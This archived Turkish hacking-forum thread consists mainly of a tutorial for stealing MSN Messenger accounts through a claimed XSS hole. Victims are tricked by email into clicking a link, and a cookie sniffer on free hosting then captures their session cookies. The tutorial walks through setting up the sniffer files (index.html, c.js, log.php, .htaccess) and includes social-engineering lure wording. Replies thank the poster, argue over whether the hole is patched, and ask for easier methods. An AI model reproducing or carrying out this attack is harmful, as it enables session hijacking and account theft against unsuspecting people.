PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: Msn Çalın Xss açığı garanti bir yöntem üstelik çok kolay hack


johnoson
12-01-2007, 12:05 PM
Biliyorum ki bu sniffer fatal admin yazmıştı ama ben onun koyduğu snifferin linkinden bir türlü indiremedim ve tam olarak anlatmamıştı(ben biliyorum ama bilmeyen yapamaz) İlk önce şöle başlayalım ben buraya yazıyorum bana olmuyor diye gelmeyin olmuyosa yapamamışınız demektir. Biraz uğraştırıcı ama garanti hack imkanı veriyor. Xss açığı da daha kapatılmadı snifferla oluyor.

Anlatıma başlıyorum..................

..şimdi gelelim konuya ...il önce gereken malzemeler...

1 adet cute ftp programı
1 adet proxomitron programı
1 adet free host ifastnet.com u tavsiye ederim
1 adet sniffer

cute ftp programını heryerde bulabilirsiniz

proxomitron
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
sniffer
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
bunlarıda kendim upload ettim değerimi bilin rar şifresi Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

şimdi öncelikle host alıcaz Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. a giriyoruz signup diyoruz ve gerekli bilgileri doldurarak sitemizi alıyoruz sitenizin ismi Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ıcıadınız.ifastnet.com olacak

daha sonra verdiğim snifferdaki index.html dosyasını not defteriyle açın ve Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. yazan yere aldığınız adresi yazın yani Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ıcıadınız.ifastnet.com yazcaksınız sonundaki /c.js uzantısına dokunmayın sakın o kalsın bunu kaydedip kapatın.daha sonra yine snifferdaki log.php dosyasını yine not defteriyle açıp şu kodları bulun

$kul[0]['username']="üye";
$kul[0]['password']="şifre";

buradaki üye yerine kullanıcı adınızı şifre yerine şifrenizi yazıp kaydedin log.phpye şifre olayını ben ekledim çünkü sizin aldığınız cookieleri başkalarıda sömürebilir uyanıklara göz açtırmamak lazım.Sonra c.js dosyasını notdefteri ile açıp Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ıcıadınız.ifastnet.com yazan yere kendi sitemizin linkini yazıyoruz sonundaki /s.gif uzantısı kalsın ellemeyin

sırada cute ftp programımız var programı açıyoruz ve File-New-FTP Site diyoruz çıkan pencerede host address kısmına ftp.kullanıcıadınız.ifastnet.c om yazıyoruz username ve password kısımlarına hostu alırken yazdığımız isim ve şifreyi yazıyoruz ve connect diyoruz.şimdi sağ tarafta site var sol tarafta bilgisayarımız sitedeki dosyaları sağ tıklayıp delete diyoruz ve siliyoruz sonra soldan sniffer klasörümüzün içine giriyoruz ve buradaki tüm dosyaları hepsini seçip programın araç çubuğunda yukarı doğru ok işareti var ona tıklayıp upload ediyoruz.upload ettiğimiz dosyalar içinde data.txt dosyasına sağ tıklayıp properties penceresini açıyoruz ve dosyanın chmod ayarını 755 yapıyoruz bu önemli...

şimdi verdiğim kodları not defterine yapıştırın

<Files "s.gif">
AddType application/x-Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. .gif
</Files>
<Files "data.txt">
order allow,deny
deny from all
</Files>

ve bilgisayarınıza kaydedin ismi önemli değil a dosyası olarak kaydedelim
sonra bu a dosyasını aynı şekilde hostumuza diğer dosyalarımızın yanına upload ediyoruz ve ismini .htaccess olarak değiştiriyoruz

şimdi bitti

artık msn çalabilirsiniz tek yapmanız gereken kurbanınıza bir email atmak...ona şu linke bi gir bak ne var çok komik falan deyin ve Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ıcıadınız.ifastnet.com linkini gönderin tıkladığı anda cookiesi sizin log dosyasına gider.cookieleri görmek için
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ıcıadınız.ifastnet.com/log.php adresine bakın girişte işfre sorar şifre yukarda verdiğim kodlarda yazdığınız şifredir hepsi bu..

peki cookieyi aldık şimdi kurbanın msnine nasıl girecez onuda artık video anlatsın...

Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

rar şifre :sarabande


NOT: ALINTI DEĞİLDİR EMEKTİR snifferi başka yerde bulamazsınız kodlama bana aiittir. uploadlar benimdir. Emeğe saygı

descrutive
12-01-2007, 12:07 PM
messenger live ile bunu kpattı kilit lütfen..
artık oLmayan 1 açığı ortaya tekrar sunmaya gerek yok
yinede emeğine sağlık

johnoson
12-01-2007, 12:10 PM
hayır bu açık daha hala duruyorr

refractive_decoder
12-01-2007, 12:19 PM
hala acıkdan faydalanabiliriz

yunusklc
12-01-2007, 12:23 PM
ii faydalanın!

onuragtas100
01-05-2008, 10:29 PM
eyw saol lazımdı

selahaddineyyubi
01-05-2008, 11:07 PM
çok kolay değil

greatberfu
01-05-2008, 11:28 PM
saol emeğe saygı

qürk@n
04-22-2008, 06:58 PM
konu taşındı.

hacker_uğur
04-25-2008, 12:30 PM
ömür yiyor bunlar başka bişeye yaramıyor

mehmedım
04-25-2008, 01:50 PM
arkadaşlar merhaba öncelikle ben bu xss i çok ullandım ve çok uzun zamandırda bu yöntemle baya iş gördüm diyebiliim ama şu an konulardan baya uzağım eğer ki oluyorsa hazır snifferlarım var sadece iindexi değiştirerek bu işi halledebiliriz herhalde yapan arkadaşlar bana en son yaptığı işi "tarihiyle gönderebilir mi" yani açık en son hangi tarihte çalışmış merak ettim gerisi kolay zaten cevap bekliyorum ilgili arkadaşlar bilgilendirirlerse gerçekten sevinirim...

adonax
04-25-2008, 02:10 PM
bunu yapabilmek için baya uzman olmak lkazım kardeş genede saol

adonax
04-25-2008, 02:11 PM
şu işin biraz daha kolay olanı yokmu ...?

MusT-i
04-25-2008, 02:17 PM
tşkkürler